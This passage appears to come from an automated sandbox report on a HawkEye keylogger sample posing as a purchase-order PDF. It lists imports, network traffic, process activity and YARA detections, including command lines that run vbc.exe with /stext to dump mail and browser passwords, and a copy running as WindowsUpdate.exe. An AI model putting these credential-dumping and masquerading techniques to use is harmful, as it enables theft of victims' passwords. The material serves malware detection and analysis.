                                                RT_GROUP_ICON0x716c80x4cdataEnglishUnited States

                                                Imports

                                                DLLImport
                                                KERNEL32.dllHeap32Next, LoadResource, FreeLibrary, GetLongPathNameA, CancelIo, BuildCommDCBAndTimeoutsA, ExitThread, GlobalFindAtomW, GetStdHandle, HeapAlloc, GetProcessHeap, SetConsoleCursorPosition, DecodePointer, EncodePointer, SetEndOfFile, WriteConsoleW, HeapReAlloc, HeapSize, GetTimeZoneInformation, SetConsoleMode, ReadConsoleInputW, ReadConsoleInputA, PeekConsoleInputA, GetNumberOfConsoleInputEvents, CreateFileW, SetConsoleCtrlHandler, GetStringTypeW, SetStdHandle, SetEnvironmentVariableW, SetEnvironmentVariableA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetCPInfo, GetOEMCP, IsValidCodePage, FindNextFileW, FindNextFileA, FindFirstFileExW, FindFirstFileExA, FindClose, MoveFileExW, GetFileAttributesExW, CreateProcessW, CreateProcessA, GetExitCodeProcess, WaitForSingleObject, GetCurrentThread, DeleteFileW, CloseHandle, GetConsoleCP, FlushFileBuffers, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, GetModuleHandleW, GetCurrentProcess, TerminateProcess, InterlockedPushEntrySList, InterlockedFlushSList, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetProcAddress, LoadLibraryExW, ExitProcess, GetModuleHandleExW, ReadFile, QueryPerformanceFrequency, MultiByteToWideChar, WriteFile, GetModuleFileNameW, GetModuleFileNameA, WideCharToMultiByte, GetACP, HeapFree, SetFilePointerEx, GetConsoleMode, ReadConsoleW, GetFileType, OutputDebugStringA, OutputDebugStringW, GetDateFormatW, GetTimeFormatW, CompareStringW, LCMapStringW, GetLocaleInfoW, RaiseException
                                                SHELL32.dllDragQueryFile, Shell_NotifyIconA
                                                MSWSOCK.dllEnumProtocolsA, GetNameByTypeW, GetServiceA, getnetbyname
                                                mscms.dllEnumColorProfilesW, UnregisterCMMA, CreateProfileFromLogColorSpaceW, GetPS2ColorRenderingIntent, EnumColorProfilesA
                                                msi.dll
                                                WS2_32.dllgethostbyaddr, WSCInstallNameSpace, WSALookupServiceNextA, WSARemoveServiceClass
                                                ODBC32.dllVRetrieveDriverErrorsRowCol
                                                USER32.dllGetDC, GrayStringW

                                                Possible Origin

                                                Language of compilation systemCountry where language is spokenMap
                                                EnglishUnited States

                                                Network Behavior

                                                Snort IDS Alerts

                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                01/19/21-14:07:24.893873TCP1201ATTACK-RESPONSES 403 Forbidden8049709104.16.155.36192.168.2.3

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Jan 19, 2021 14:07:24.803280115 CET4970980192.168.2.3104.16.155.36
                                                Jan 19, 2021 14:07:24.843286991 CET8049709104.16.155.36192.168.2.3
                                                Jan 19, 2021 14:07:24.843444109 CET4970980192.168.2.3104.16.155.36
                                                Jan 19, 2021 14:07:24.844419956 CET4970980192.168.2.3104.16.155.36
                                                Jan 19, 2021 14:07:24.884332895 CET8049709104.16.155.36192.168.2.3
                                                Jan 19, 2021 14:07:24.893872976 CET8049709104.16.155.36192.168.2.3
                                                Jan 19, 2021 14:07:24.944005013 CET4970980192.168.2.3104.16.155.36
                                                Jan 19, 2021 14:08:07.401418924 CET4970980192.168.2.3104.16.155.36

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Jan 19, 2021 14:07:24.737133026 CET5062053192.168.2.38.8.8.8
                                                Jan 19, 2021 14:07:24.784964085 CET53506208.8.8.8192.168.2.3
                                                Jan 19, 2021 14:07:27.024379015 CET6493853192.168.2.38.8.8.8
                                                Jan 19, 2021 14:07:27.080846071 CET53649388.8.8.8192.168.2.3
                                                Jan 19, 2021 14:07:29.446954966 CET6015253192.168.2.38.8.8.8
                                                Jan 19, 2021 14:07:29.503288984 CET53601528.8.8.8192.168.2.3
                                                Jan 19, 2021 14:07:38.352360964 CET5754453192.168.2.38.8.8.8
                                                Jan 19, 2021 14:07:38.406651974 CET5598453192.168.2.38.8.8.8
                                                Jan 19, 2021 14:07:38.416496992 CET53575448.8.8.8192.168.2.3
                                                Jan 19, 2021 14:07:38.465986013 CET53559848.8.8.8192.168.2.3
                                                Jan 19, 2021 14:07:41.692348957 CET6418553192.168.2.38.8.8.8
                                                Jan 19, 2021 14:07:41.777007103 CET53641858.8.8.8192.168.2.3
                                                Jan 19, 2021 14:07:46.849670887 CET6511053192.168.2.38.8.8.8
                                                Jan 19, 2021 14:07:46.898314953 CET53651108.8.8.8192.168.2.3
                                                Jan 19, 2021 14:07:53.292752028 CET5836153192.168.2.38.8.8.8
                                                Jan 19, 2021 14:07:53.342840910 CET53583618.8.8.8192.168.2.3
                                                Jan 19, 2021 14:07:59.963716030 CET6349253192.168.2.38.8.8.8
                                                Jan 19, 2021 14:08:00.014316082 CET53634928.8.8.8192.168.2.3
                                                Jan 19, 2021 14:08:02.032809973 CET6083153192.168.2.38.8.8.8
                                                Jan 19, 2021 14:08:02.093347073 CET53608318.8.8.8192.168.2.3
                                                Jan 19, 2021 14:08:04.101022005 CET6010053192.168.2.38.8.8.8
                                                Jan 19, 2021 14:08:04.151834011 CET53601008.8.8.8192.168.2.3
                                                Jan 19, 2021 14:08:11.430254936 CET5319553192.168.2.38.8.8.8
                                                Jan 19, 2021 14:08:11.486526012 CET53531958.8.8.8192.168.2.3
                                                Jan 19, 2021 14:08:11.658313990 CET5014153192.168.2.38.8.8.8
                                                Jan 19, 2021 14:08:11.719221115 CET53501418.8.8.8192.168.2.3
                                                Jan 19, 2021 14:08:12.349411964 CET5302353192.168.2.38.8.8.8
                                                Jan 19, 2021 14:08:12.397241116 CET53530238.8.8.8192.168.2.3
                                                Jan 19, 2021 14:08:13.509324074 CET4956353192.168.2.38.8.8.8
                                                Jan 19, 2021 14:08:13.557267904 CET53495638.8.8.8192.168.2.3
                                                Jan 19, 2021 14:08:19.087261915 CET5135253192.168.2.38.8.8.8
                                                Jan 19, 2021 14:08:19.135039091 CET53513528.8.8.8192.168.2.3
                                                Jan 19, 2021 14:08:20.055285931 CET5934953192.168.2.38.8.8.8
                                                Jan 19, 2021 14:08:20.111741066 CET53593498.8.8.8192.168.2.3
                                                Jan 19, 2021 14:08:21.066859961 CET5708453192.168.2.38.8.8.8
                                                Jan 19, 2021 14:08:21.114937067 CET53570848.8.8.8192.168.2.3
                                                Jan 19, 2021 14:08:27.746773005 CET5882353192.168.2.38.8.8.8
                                                Jan 19, 2021 14:08:27.794595957 CET53588238.8.8.8192.168.2.3
                                                Jan 19, 2021 14:08:31.018626928 CET5756853192.168.2.38.8.8.8
                                                Jan 19, 2021 14:08:31.066662073 CET53575688.8.8.8192.168.2.3
                                                Jan 19, 2021 14:08:33.980485916 CET5054053192.168.2.38.8.8.8
                                                Jan 19, 2021 14:08:34.031049013 CET53505408.8.8.8192.168.2.3
                                                Jan 19, 2021 14:08:37.069364071 CET5436653192.168.2.38.8.8.8
                                                Jan 19, 2021 14:08:37.125648975 CET53543668.8.8.8192.168.2.3
                                                Jan 19, 2021 14:08:42.337563992 CET5303453192.168.2.38.8.8.8
                                                Jan 19, 2021 14:08:42.385427952 CET53530348.8.8.8192.168.2.3
                                                Jan 19, 2021 14:08:42.811871052 CET5776253192.168.2.38.8.8.8
                                                Jan 19, 2021 14:08:42.859744072 CET53577628.8.8.8192.168.2.3
                                                Jan 19, 2021 14:09:08.177627087 CET5543553192.168.2.38.8.8.8
                                                Jan 19, 2021 14:09:08.225469112 CET53554358.8.8.8192.168.2.3
                                                Jan 19, 2021 14:09:09.648237944 CET5071353192.168.2.38.8.8.8
                                                Jan 19, 2021 14:09:09.699141026 CET53507138.8.8.8192.168.2.3
                                                Jan 19, 2021 14:09:41.623981953 CET5613253192.168.2.38.8.8.8
                                                Jan 19, 2021 14:09:41.674923897 CET53561328.8.8.8192.168.2.3
                                                Jan 19, 2021 14:09:59.172621965 CET5898753192.168.2.38.8.8.8
                                                Jan 19, 2021 14:09:59.220423937 CET53589878.8.8.8192.168.2.3
                                                Jan 19, 2021 14:09:59.894496918 CET5657953192.168.2.38.8.8.8
                                                Jan 19, 2021 14:09:59.951042891 CET53565798.8.8.8192.168.2.3
                                                Jan 19, 2021 14:10:03.218694925 CET6063353192.168.2.38.8.8.8
                                                Jan 19, 2021 14:10:03.275172949 CET53606338.8.8.8192.168.2.3
                                                Jan 19, 2021 14:10:03.438195944 CET6129253192.168.2.38.8.8.8
                                                Jan 19, 2021 14:10:03.494326115 CET53612928.8.8.8192.168.2.3
                                                Jan 19, 2021 14:10:04.525226116 CET6361953192.168.2.38.8.8.8
                                                Jan 19, 2021 14:10:04.587599993 CET53636198.8.8.8192.168.2.3
                                                Jan 19, 2021 14:10:05.257047892 CET6493853192.168.2.38.8.8.8
                                                Jan 19, 2021 14:10:05.313369989 CET53649388.8.8.8192.168.2.3
                                                Jan 19, 2021 14:10:05.526376009 CET6194653192.168.2.38.8.8.8
                                                Jan 19, 2021 14:10:05.585340977 CET53619468.8.8.8192.168.2.3
                                                Jan 19, 2021 14:10:06.657068968 CET6491053192.168.2.38.8.8.8
                                                Jan 19, 2021 14:10:06.705086946 CET53649108.8.8.8192.168.2.3
                                                Jan 19, 2021 14:10:07.892919064 CET5212353192.168.2.38.8.8.8
                                                Jan 19, 2021 14:10:07.952100992 CET53521238.8.8.8192.168.2.3
                                                Jan 19, 2021 14:10:09.728214979 CET5613053192.168.2.38.8.8.8
                                                Jan 19, 2021 14:10:10.763556004 CET5613053192.168.2.38.8.8.8
                                                Jan 19, 2021 14:10:11.809860945 CET5613053192.168.2.38.8.8.8
                                                Jan 19, 2021 14:10:11.873954058 CET53561308.8.8.8192.168.2.3
                                                Jan 19, 2021 14:10:13.257555962 CET5633853192.168.2.38.8.8.8
                                                Jan 19, 2021 14:10:13.315814018 CET53563388.8.8.8192.168.2.3

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                Jan 19, 2021 14:07:24.737133026 CET192.168.2.38.8.8.80x8b8dStandard query (0)whatismyipaddress.comA (IP address)IN (0x0001)

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                Jan 19, 2021 14:07:24.784964085 CET8.8.8.8192.168.2.30x8b8dNo error (0)whatismyipaddress.com104.16.155.36A (IP address)IN (0x0001)
                                                Jan 19, 2021 14:07:24.784964085 CET8.8.8.8192.168.2.30x8b8dNo error (0)whatismyipaddress.com104.16.154.36A (IP address)IN (0x0001)

                                                HTTP Request Dependency Graph

                                                • whatismyipaddress.com

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                0192.168.2.349709104.16.155.3680C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe
                                                TimestampkBytes transferredDirectionData
                                                Jan 19, 2021 14:07:24.844419956 CET0OUTGET / HTTP/1.1
                                                Host: whatismyipaddress.com
                                                Connection: Keep-Alive
                                                Jan 19, 2021 14:07:24.893872976 CET1INHTTP/1.1 403 Forbidden
                                                Date: Tue, 19 Jan 2021 13:07:24 GMT
                                                Content-Type: text/plain; charset=UTF-8
                                                Content-Length: 16
                                                Connection: keep-alive
                                                X-Frame-Options: SAMEORIGIN
                                                Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                Set-Cookie: __cfduid=dc5c380c1a5d92fcf9cb84a16088ebe551611061644; expires=Thu, 18-Feb-21 13:07:24 GMT; path=/; domain=.whatismyipaddress.com; HttpOnly; SameSite=Lax; Secure
                                                cf-request-id: 07bc5ae64d0000d711d12b6000000001
                                                Server: cloudflare
                                                CF-RAY: 6140c7507a92d711-FRA
                                                Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30
                                                Data Ascii: error code: 1020


                                                Code Manipulations

                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                Analysis Process: PO 2010029_pdf Quotation from Alibaba Ale.exe PID: 2148 Parent PID: 5704

                                                General

                                                Start time:14:08:10
                                                Start date:19/01/2021
                                                Path:C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe
                                                Wow64 process (32bit):true
                                                Commandline:'C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe'
                                                Imagebase:0xad0000
                                                File size:1074688 bytes
                                                MD5 hash:EB59D99961C7636B4872E389DA03CBC9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Yara matches:
                                                • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000000.00000002.316835361.000000001DCF1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000000.00000002.316835361.000000001DCF1000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000002.316835361.000000001DCF1000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000000.00000002.316835361.000000001DCF1000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000000.00000002.316835361.000000001DCF1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000000.00000002.317001771.000000001EEAE000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000000.00000002.317001771.000000001EEAE000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000002.317001771.000000001EEAE000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000000.00000002.317001771.000000001EEAE000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000000.00000002.317001771.000000001EEAE000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000000.00000002.317140638.000000001EFE2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000000.00000002.317140638.000000001EFE2000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000002.317140638.000000001EFE2000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000000.00000002.317140638.000000001EFE2000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000000.00000002.317140638.000000001EFE2000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000000.00000002.317057911.000000001EF40000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000000.00000002.317057911.000000001EF40000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000002.317057911.000000001EF40000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000000.00000002.317057911.000000001EF40000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000000.00000002.317057911.000000001EF40000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000000.00000002.311897650.000000001C6F0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000000.00000002.311897650.000000001C6F0000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000002.311897650.000000001C6F0000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000000.00000002.311897650.000000001C6F0000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000000.00000002.311897650.000000001C6F0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000000.00000002.313417162.000000001CCF1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000002.313417162.000000001CCF1000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000000.00000002.313417162.000000001CCF1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:low

                                                Chronological Activities

                                                Analysis Process: dw20.exe PID: 4636 Parent PID: 2148

                                                General

                                                Start time:14:08:17
                                                Start date:19/01/2021
                                                Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                Wow64 process (32bit):true
                                                Commandline:dw20.exe -x -s 2216
                                                Imagebase:0x7ff6741d0000
                                                File size:33936 bytes
                                                MD5 hash:8D10DA8A3E11747E51F23C882C22BBC3
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Chronological Activities

                                                Analysis Process: vbc.exe PID: 6084 Parent PID: 2148

                                                General

                                                Start time:14:08:20
                                                Start date:19/01/2021
                                                Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                                                Imagebase:0x400000
                                                File size:1171592 bytes
                                                MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                Reputation:high

                                                Chronological Activities

                                                Analysis Process: vbc.exe PID: 968 Parent PID: 2148

                                                General

                                                Start time:14:08:20
                                                Start date:19/01/2021
                                                Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                                                Imagebase:0x400000
                                                File size:1171592 bytes
                                                MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                Reputation:high

                                                Chronological Activities

                                                Analysis Process: WerFault.exe PID: 6004 Parent PID: 2148

                                                General

                                                Start time:14:08:22
                                                Start date:19/01/2021
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2148 -s 2244
                                                Imagebase:0xe50000
                                                File size:434592 bytes
                                                MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Reputation:high

                                                Chronological Activities

                                                Analysis Process: WindowsUpdate.exe PID: 4848 Parent PID: 3388

                                                General

                                                Start time:14:08:30
                                                Start date:19/01/2021
                                                Path:C:\Users\user\AppData\Roaming\WindowsUpdate.exe
                                                Wow64 process (32bit):true
                                                Commandline:'C:\Users\user\AppData\Roaming\WindowsUpdate.exe'
                                                Imagebase:0xed0000
                                                File size:1074688 bytes
                                                MD5 hash:EB59D99961C7636B4872E389DA03CBC9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Yara matches:
                                                • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000008.00000002.305904316.000000001C5F0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000008.00000002.305904316.000000001C5F0000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000008.00000002.305904316.000000001C5F0000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000008.00000002.305904316.000000001C5F0000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000008.00000002.305904316.000000001C5F0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000008.00000002.308219748.000000001DBD1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000008.00000002.308219748.000000001DBD1000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000008.00000002.308219748.000000001DBD1000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000008.00000002.308219748.000000001DBD1000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000008.00000002.308219748.000000001DBD1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000008.00000002.300925836.0000000000400000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000008.00000002.300925836.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000008.00000002.300925836.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000008.00000002.300925836.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000008.00000002.300925836.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000008.00000002.305233571.000000001AD92000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000008.00000002.305233571.000000001AD92000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000008.00000002.305233571.000000001AD92000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000008.00000002.305233571.000000001AD92000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000008.00000002.305233571.000000001AD92000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                Antivirus matches:
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 37%, ReversingLabs
                                                Reputation:low

                                                Chronological Activities

                                                Analysis Process: WindowsUpdate.exe PID: 6328 Parent PID: 3388

                                                General

                                                Start time:14:08:39
                                                Start date:19/01/2021
                                                Path:C:\Users\user\AppData\Roaming\WindowsUpdate.exe
                                                Wow64 process (32bit):true
                                                Commandline:'C:\Users\user\AppData\Roaming\WindowsUpdate.exe'
                                                Imagebase:0xed0000
                                                File size:1074688 bytes
                                                MD5 hash:EB59D99961C7636B4872E389DA03CBC9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Yara matches:
                                                • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000B.00000002.312787394.000000001EE40000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000B.00000002.312787394.000000001EE40000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000B.00000002.312787394.000000001EE40000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000B.00000002.312787394.000000001EE40000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000B.00000002.312787394.000000001EE40000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000B.00000002.312583133.000000001DCB1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000B.00000002.312583133.000000001DCB1000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000B.00000002.312583133.000000001DCB1000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000B.00000002.312583133.000000001DCB1000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000B.00000002.312583133.000000001DCB1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000B.00000002.301969493.0000000000400000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000B.00000002.301969493.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
